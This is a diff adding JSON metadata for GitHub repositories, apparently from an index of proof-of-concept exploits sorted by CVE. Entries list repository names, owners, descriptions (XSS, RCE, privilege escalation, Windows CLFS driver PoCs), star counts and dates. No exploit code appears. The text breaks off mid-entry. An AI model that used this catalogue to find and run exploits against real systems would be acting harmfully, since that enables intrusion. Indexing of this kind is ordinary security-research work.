"owner": { + "login": "SakuraSamuraii", + "id": 90020213, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90020213?v=4", + "html_url": "https:\/\/github.com\/SakuraSamuraii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SakuraSamuraii\/CVE-2021-43032", + "description": "Post authenticated stored-xss in XenForo versions ≤ 2.2.7", + "fork": false, + "created_at": "2021-10-29T14:09:44Z", + "updated_at": "2023-09-19T17:07:22Z", + "pushed_at": "2021-10-29T14:41:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-43032", + "stored-xss-exploit", + "xenforo", + "xenforo2" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43129.json b/2021/CVE-2021-43129.json new file mode 100644 index 0000000000..ac7c635873 --- /dev/null +++ b/2021/CVE-2021-43129.json @@ -0,0 +1,40 @@ +[ + { + "id": 480972575, + "name": "CVE-2021-43129", + "full_name": "Skotizo\/CVE-2021-43129", + "owner": { + "login": "Skotizo", + "id": 43425616, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43425616?v=4", + "html_url": "https:\/\/github.com\/Skotizo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Skotizo\/CVE-2021-43129", + "description": "Vulnerability in D2L Brightspace's Learning Management System(LMS)", + "fork": false, + "created_at": "2022-04-12T21:04:44Z", + "updated_at": "2022-10-26T20:41:12Z", + "pushed_at": "2022-04-29T06:20:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cybersecurity", + "exploit", + "information-security", + "mitre-attack", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43141.json b/2021/CVE-2021-43141.json new file mode 100644 index 0000000000..9649d3a686 --- /dev/null +++ b/2021/CVE-2021-43141.json @@ -0,0 +1,33 @@ +[ + { + "id": 424435988, + "name": "CVE-2021-43141", + "full_name": "Jeromeyoung\/CVE-2021-43141", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-43141", + "description": "Information about CVE-2021-43141, a reflected XSS in the plan_application section.", + "fork": false, + "created_at": "2021-11-04T01:34:12Z", + "updated_at": "2021-11-04T01:34:13Z", + "pushed_at": "2021-11-03T17:57:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43217.json b/2021/CVE-2021-43217.json new file mode 100644 index 0000000000..1cc22ba235 --- /dev/null +++ b/2021/CVE-2021-43217.json @@ -0,0 +1,33 @@ +[ + { + "id": 775285832, + "name": "EFS_CVE-2021-43217", + "full_name": "JolynNgSC\/EFS_CVE-2021-43217", + "owner": { + "login": "JolynNgSC", + "id": 164031233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164031233?v=4", + "html_url": "https:\/\/github.com\/JolynNgSC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JolynNgSC\/EFS_CVE-2021-43217", + "description": null, + "fork": false, + "created_at": "2024-03-21T05:12:25Z", + "updated_at": "2024-05-02T05:16:39Z", + "pushed_at": "2024-05-02T05:16:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43224.json b/2021/CVE-2021-43224.json new file mode 100644 index 0000000000..1646cff4cf --- /dev/null +++ b/2021/CVE-2021-43224.json @@ -0,0 +1,33 @@ +[ + { + "id": 440359142, + "name": "CVE-2021-43224-POC", + "full_name": "KaLendsi\/CVE-2021-43224-POC", + "owner": { + "login": "KaLendsi", + "id": 68001644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4", + "html_url": "https:\/\/github.com\/KaLendsi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2021-43224-POC", + "description": "Windows Common Log File System Driver POC", + "fork": false, + "created_at": "2021-12-21T01:51:41Z", + "updated_at": "2024-08-12T20:19:04Z", + "pushed_at": "2021-12-21T06:57:06Z", + "stargazers_count": 94, + "watchers_count": 94, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 94, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43226.json b/2021/CVE-2021-43226.json new file mode 100644 index 0000000000..75f8e8d62a --- /dev/null +++ b/2021/CVE-2021-43226.json @@ -0,0 +1,33 @@ +[ + { + "id": 711778105, + "name": "cve-2021-43226PoC", + "full_name": "Rosayxy\/cve-2021-43226PoC", + "owner": { + "login": "Rosayxy", + "id": 130039321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130039321?v=4", + "html_url": "https:\/\/github.com\/Rosayxy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rosayxy\/cve-2021-43226PoC", + "description": "a Proof of Concept of cve-2021-43226,stack overflow in Windows driver clfs.sys", + "fork": false, + "created_at": "2023-10-30T06:47:50Z", + "updated_at": "2024-01-17T12:52:09Z", + "pushed_at": "2023-10-30T07:34:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43229.json b/2021/CVE-2021-43229.json new file mode 100644 index 0000000000..389fe44dd4 --- /dev/null +++ b/2021/CVE-2021-43229.json @@ -0,0 +1,33 @@ +[ + { + "id": 500853465, + "name": "CVE-2021-43229", + "full_name": "Citizen13X\/CVE-2021-43229", + "owner": { + "login": "Citizen13X", + "id": 106006863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106006863?v=4", + "html_url": "https:\/\/github.com\/Citizen13X", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Citizen13X\/CVE-2021-43229", + "description": "CVE-2021-43229 Walkthrough", + "fork": false, + "created_at": "2022-06-07T13:32:17Z", + "updated_at": "2022-07-11T12:36:29Z", + "pushed_at": "2022-06-17T16:12:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43258.json b/2021/CVE-2021-43258.json new file mode 100644 index 0000000000..94277235a3 --- /dev/null +++ b/2021/CVE-2021-43258.json @@ -0,0 +1,33 @@ +[ + { + "id": 570827756, + "name": "CVE-2021-43258", + "full_name": "MRvirusIR\/CVE-2021-43258", + "owner": { + "login": "MRvirusIR", + "id": 22262459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22262459?v=4", + "html_url": "https:\/\/github.com\/MRvirusIR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MRvirusIR\/CVE-2021-43258", + "description": "ChurchInfo 1.2.13-1.3.0 Remote Code Execution Exploit", + "fork": false, + "created_at": "2022-11-26T09:00:10Z", + "updated_at": "2023-07-14T23:04:11Z", + "pushed_at": "2022-11-26T11:10:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43267.json b/2021/CVE-2021-43267.json new file mode 100644 index 0000000000..10cbc9a9e5 --- /dev/null +++ b/2021/CVE-2021-43267.json @@ -0,0 +1,64 @@ +[ + { + "id": 426061438, + "name": "CVE-2021-43267-POC", + "full_name": "DarkSprings\/CVE-2021-43267-POC", + "owner": { + "login": "DarkSprings", + "id": 90366126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4", + "html_url": "https:\/\/github.com\/DarkSprings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-43267-POC", + "description": "trusty poc Provide it to legitimate people", + "fork": false, + "created_at": "2021-11-09T02:14:13Z", + "updated_at": "2021-11-09T03:26:22Z", + "pushed_at": "2021-11-09T03:26:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 432048812, + "name": "CVE-2021-43267", + "full_name": "zzhacked\/CVE-2021-43267", + "owner": { + "login": "zzhacked", + "id": 8380809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8380809?v=4", + "html_url": "https:\/\/github.com\/zzhacked", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zzhacked\/CVE-2021-43267", + "description": "Local PoC exploit for CVE-2021-43267 (Linux TIPC)", + "fork": false, + "created_at": "2021-11-26T04:00:56Z", + "updated_at": "2024-11-02T14:53:56Z", + "pushed_at": "2021-11-26T01:54:47Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43287.json b/2021/CVE-2021-43287.json new file mode 100644 index 0000000000..02c59750cc --- /dev/null +++ b/2021/CVE-2021-43287.json @@ -0,0 +1,33 @@ +[ + { + "id": 489551378, + "name": "CVE-2021-43287", + "full_name": "Wrin9\/CVE-2021-43287", + "owner": { + "login": "Wrin9", + "id": 54984589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4", + "html_url": "https:\/\/github.com\/Wrin9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wrin9\/CVE-2021-43287", + "description": "CVE-2021-43287_GoCD_fileread_POC_EXP", + "fork": false, + "created_at": "2022-05-07T02:54:59Z", + "updated_at": "2022-08-15T15:42:23Z", + "pushed_at": "2022-05-16T01:44:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43297.json b/2021/CVE-2021-43297.json new file mode 100644 index 0000000000..34f416250e --- /dev/null +++ b/2021/CVE-2021-43297.json @@ -0,0 +1,64 @@ +[ + { + "id": 448884093, + "name": "CVE-2021-43297-POC", + "full_name": "bitterzzZZ\/CVE-2021-43297-POC", + "owner": { + "login": "bitterzzZZ", + "id": 44869820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44869820?v=4", + "html_url": "https:\/\/github.com\/bitterzzZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bitterzzZZ\/CVE-2021-43297-POC", + "description": "CVE-2021-43297 POC,Apache Dubbo<= 2.7.13时可以实现RCE", + "fork": false, + "created_at": "2022-01-17T12:26:18Z", + "updated_at": "2023-12-11T06:17:39Z", + "pushed_at": "2022-01-24T11:24:56Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 448994557, + "name": "Apache-Dubbo-Hessian2-CVE-2021-43297", + "full_name": "longofo\/Apache-Dubbo-Hessian2-CVE-2021-43297", + "owner": { + "login": "longofo", + "id": 19823813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19823813?v=4", + "html_url": "https:\/\/github.com\/longofo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/longofo\/Apache-Dubbo-Hessian2-CVE-2021-43297", + "description": "Apache Dubbo Hessian2 CVE-2021-43297 demo", + "fork": false, + "created_at": "2022-01-17T17:52:34Z", + "updated_at": "2023-06-11T12:04:19Z", + "pushed_at": "2022-01-18T03:43:51Z", + "stargazers_count": 46, + "watchers_count": 46, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 46, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43326.json b/2021/CVE-2021-43326.json new file mode 100644 index 0000000000..71969c6ce6 --- /dev/null +++ b/2021/CVE-2021-43326.json @@ -0,0 +1,33 @@ +[ + { + "id": 437963336, + "name": "CVE-2021-43326_Exploit", + "full_name": "gfoss\/CVE-2021-43326_Exploit", + "owner": { + "login": "gfoss", + "id": 727732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/727732?v=4", + "html_url": "https:\/\/github.com\/gfoss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gfoss\/CVE-2021-43326_Exploit", + "description": ":boom: Automox Windows Agent Privilege Escalation Exploit", + "fork": false, + "created_at": "2021-12-13T17:26:28Z", + "updated_at": "2024-02-24T11:42:37Z", + "pushed_at": "2022-01-06T20:49:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43408.json b/2021/CVE-2021-43408.json new file mode 100644 index 0000000000..d694b533ae --- /dev/null +++ b/2021/CVE-2021-43408.json @@ -0,0 +1,33 @@ +[ + { + "id": 498166996, + "name": "CVE-2021-43408", + "full_name": "tuannq2299\/CVE-2021-43408", + "owner": { + "login": "tuannq2299", + "id": 66456080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66456080?v=4", + "html_url": "https:\/\/github.com\/tuannq2299", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuannq2299\/CVE-2021-43408", + "description": null, + "fork": false, + "created_at": "2022-05-31T03:00:27Z", + "updated_at": "2022-05-31T03:17:53Z", + "pushed_at": "2022-05-31T04:14:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43469.json b/2021/CVE-2021-43469.json new file mode 100644 index 0000000000..9b6a8244d1 --- /dev/null +++ b/2021/CVE-2021-43469.json @@ -0,0 +1,33 @@ +[ + { + "id": 424084977, + "name": "CVE-2021-43469", + "full_name": "badboycxcc\/CVE-2021-43469", + "owner": { + "login": "badboycxcc", + "id": 72059221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72059221?v=4", + "html_url": "https:\/\/github.com\/badboycxcc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/badboycxcc\/CVE-2021-43469", + "description": "CVE-2021-43469", + "fork": false, + "created_at": "2021-11-03T03:54:14Z", + "updated_at": "2021-12-08T09:19:26Z", + "pushed_at": "2021-12-06T12:21:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43471.json b/2021/CVE-2021-43471.json new file mode 100644 index 0000000000..da44ca856e --- /dev/null +++ b/2021/CVE-2021-43471.json @@ -0,0 +1,33 @@ +[ + { + "id": 424179332, + "name": "CVE-2021-43471", + "full_name": "cxaqhq\/CVE-2021-43471", + "owner": { + "login": "cxaqhq", + "id": 32918546, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918546?v=4", + "html_url": "https:\/\/github.com\/cxaqhq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cxaqhq\/CVE-2021-43471", + "description": "CVE-2021-43471", + "fork": false, + "created_at": "2021-11-03T10:27:16Z", + "updated_at": "2021-12-06T12:19:51Z", + "pushed_at": "2021-12-06T12:19:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43503.json b/2021/CVE-2021-43503.json new file mode 100644 index 0000000000..ffb5b83821 --- /dev/null +++ b/2021/CVE-2021-43503.json @@ -0,0 +1,64 @@ +[ + { + "id": 424901298, + "name": "Laravel-vul", + "full_name": "guoyanan1g\/Laravel-vul", + "owner": { + "login": "guoyanan1g", + "id": 64716083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64716083?v=4", + "html_url": "https:\/\/github.com\/guoyanan1g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guoyanan1g\/Laravel-vul", + "description": "个人挖掘出来的漏洞CVE-2021-43503", + "fork": false, + "created_at": "2021-11-05T09:59:34Z", + "updated_at": "2023-10-07T03:57:30Z", + "pushed_at": "2023-11-07T03:06:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 495059690, + "name": "CVE-2021-43503", + "full_name": "kang8\/CVE-2021-43503", + "owner": { + "login": "kang8", + "id": 36906329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36906329?v=4", + "html_url": "https:\/\/github.com\/kang8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kang8\/CVE-2021-43503", + "description": "Case for CVE-2021-43503", + "fork": false, + "created_at": "2022-05-22T12:54:39Z", + "updated_at": "2022-05-23T06:30:51Z", + "pushed_at": "2022-08-23T01:09:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43515.json b/2021/CVE-2021-43515.json new file mode 100644 index 0000000000..2de9552e98 --- /dev/null +++ b/2021/CVE-2021-43515.json @@ -0,0 +1,33 @@ +[ + { + "id": 483326677, + "name": "CVE-2021-43515", + "full_name": "ixSly\/CVE-2021-43515", + "owner": { + "login": "ixSly", + "id": 32583633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32583633?v=4", + "html_url": "https:\/\/github.com\/ixSly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ixSly\/CVE-2021-43515", + "description": null, + "fork": false, + "created_at": "2022-04-19T16:35:57Z", + "updated_at": "2022-04-19T16:35:57Z", + "pushed_at": "2022-04-19T16:40:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43530.json b/2021/CVE-2021-43530.json new file mode 100644 index 0000000000..c414b7d32c --- /dev/null +++ b/2021/CVE-2021-43530.json @@ -0,0 +1,33 @@ +[ + { + "id": 472651368, + "name": "CVE-2021-43530-UXSS-On-QRcode-Reader-", + "full_name": "hfh86\/CVE-2021-43530-UXSS-On-QRcode-Reader-", + "owner": { + "login": "hfh86", + "id": 42328886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42328886?v=4", + "html_url": "https:\/\/github.com\/hfh86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hfh86\/CVE-2021-43530-UXSS-On-QRcode-Reader-", + "description": "CVE-2021-43530 A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox < 94.", + "fork": false, + "created_at": "2022-03-22T07:07:42Z", + "updated_at": "2022-08-13T13:05:47Z", + "pushed_at": "2022-08-11T07:23:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43557.json b/2021/CVE-2021-43557.json new file mode 100644 index 0000000000..29e0f063e1 --- /dev/null +++ b/2021/CVE-2021-43557.json @@ -0,0 +1,33 @@ +[ + { + "id": 430853881, + "name": "k8s-CVE-2021-43557-poc", + "full_name": "xvnpw\/k8s-CVE-2021-43557-poc", + "owner": { + "login": "xvnpw", + "id": 17719543, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17719543?v=4", + "html_url": "https:\/\/github.com\/xvnpw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xvnpw\/k8s-CVE-2021-43557-poc", + "description": "PoC for CVE-2021-43557", + "fork": false, + "created_at": "2021-11-22T20:23:05Z", + "updated_at": "2023-09-27T02:52:49Z", + "pushed_at": "2021-11-22T20:24:32Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43609.json b/2021/CVE-2021-43609.json new file mode 100644 index 0000000000..3a23c60d5e --- /dev/null +++ b/2021/CVE-2021-43609.json @@ -0,0 +1,33 @@ +[ + { + "id": 715293183, + "name": "CVE-2021-43609-POC", + "full_name": "d5sec\/CVE-2021-43609-POC", + "owner": { + "login": "d5sec", + "id": 127467140, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127467140?v=4", + "html_url": "https:\/\/github.com\/d5sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d5sec\/CVE-2021-43609-POC", + "description": "Proof of Concept Exploit for CVE-2021-43609", + "fork": false, + "created_at": "2023-11-06T21:13:21Z", + "updated_at": "2023-11-11T17:57:10Z", + "pushed_at": "2023-11-07T04:11:28Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43616.json b/2021/CVE-2021-43616.json new file mode 100644 index 0000000000..bb16919aed --- /dev/null +++ b/2021/CVE-2021-43616.json @@ -0,0 +1,33 @@ +[ + { + "id": 428081760, + "name": "CVE-2021-43616", + "full_name": "icatalina\/CVE-2021-43616", + "owner": { + "login": "icatalina", + "id": 4542735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4542735?v=4", + "html_url": "https:\/\/github.com\/icatalina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/icatalina\/CVE-2021-43616", + "description": "Repo demonstrating CVE-2021-43616 \/ https:\/\/github.com\/npm\/cli\/issues\/2701", + "fork": false, + "created_at": "2021-11-15T01:06:10Z", + "updated_at": "2022-04-12T02:59:18Z", + "pushed_at": "2021-11-15T01:06:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43617.json b/2021/CVE-2021-43617.json new file mode 100644 index 0000000000..4f33e56f29 --- /dev/null +++ b/2021/CVE-2021-43617.json @@ -0,0 +1,95 @@ +[ + { + "id": 429682292, + "name": "CVE-2021-43617", + "full_name": "kombat1\/CVE-2021-43617", + "owner": { + "login": "kombat1", + "id": 28701873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28701873?v=4", + "html_url": "https:\/\/github.com\/kombat1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kombat1\/CVE-2021-43617", + "description": "CVE-2021-43617 bypass CRF", + "fork": false, + "created_at": "2021-11-19T05:39:25Z", + "updated_at": "2023-01-10T03:23:18Z", + "pushed_at": "2021-11-22T12:38:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 520832418, + "name": "CVE-2021-43617", + "full_name": "aweiiy\/CVE-2021-43617", + "owner": { + "login": "aweiiy", + "id": 20345925, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20345925?v=4", + "html_url": "https:\/\/github.com\/aweiiy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aweiiy\/CVE-2021-43617", + "description": null, + "fork": false, + "created_at": "2022-08-03T10:18:44Z", + "updated_at": "2022-08-03T10:19:52Z", + "pushed_at": "2022-08-03T10:19:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 650974335, + "name": "CVE-2021-43617", + "full_name": "Sybelle03\/CVE-2021-43617", + "owner": { + "login": "Sybelle03", + "id": 107751839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107751839?v=4", + "html_url": "https:\/\/github.com\/Sybelle03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sybelle03\/CVE-2021-43617", + "description": "This is a reproduction of PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF) vulnerability", + "fork": false, + "created_at": "2023-06-08T08:05:36Z", + "updated_at": "2024-07-29T22:03:00Z", + "pushed_at": "2023-06-08T08:38:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43650.json b/2021/CVE-2021-43650.json new file mode 100644 index 0000000000..d6e19e6eef --- /dev/null +++ b/2021/CVE-2021-43650.json @@ -0,0 +1,33 @@ +[ + { + "id": 859923948, + "name": "CVE-2021-43650", + "full_name": "OpenXP-Research\/CVE-2021-43650", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2021-43650", + "description": "Webrun <= 3.6.0.42 SQLi", + "fork": false, + "created_at": "2024-09-19T14:10:00Z", + "updated_at": "2024-09-19T14:10:58Z", + "pushed_at": "2024-09-19T14:10:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-43657.json b/2021/CVE-2021-43657.json new file mode 100644 index 0000000000..0644ae353c --- /dev/null +++ b/2021/CVE-2021-43657.json @@ -0,0 +1,33 @@ +[ + { + "id": 563148797, + "name": "CVE-2021-43657", + "full_name": "c0n5n3d\/CVE-2021-43657", + "owner": { + "login": "c0n5n3d", + "id": 40382877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40382877?v=4", + "html_url": "https:\/\/github.com\/c0n5n3d", + "user_view_type": "public" + }, + "html_url": 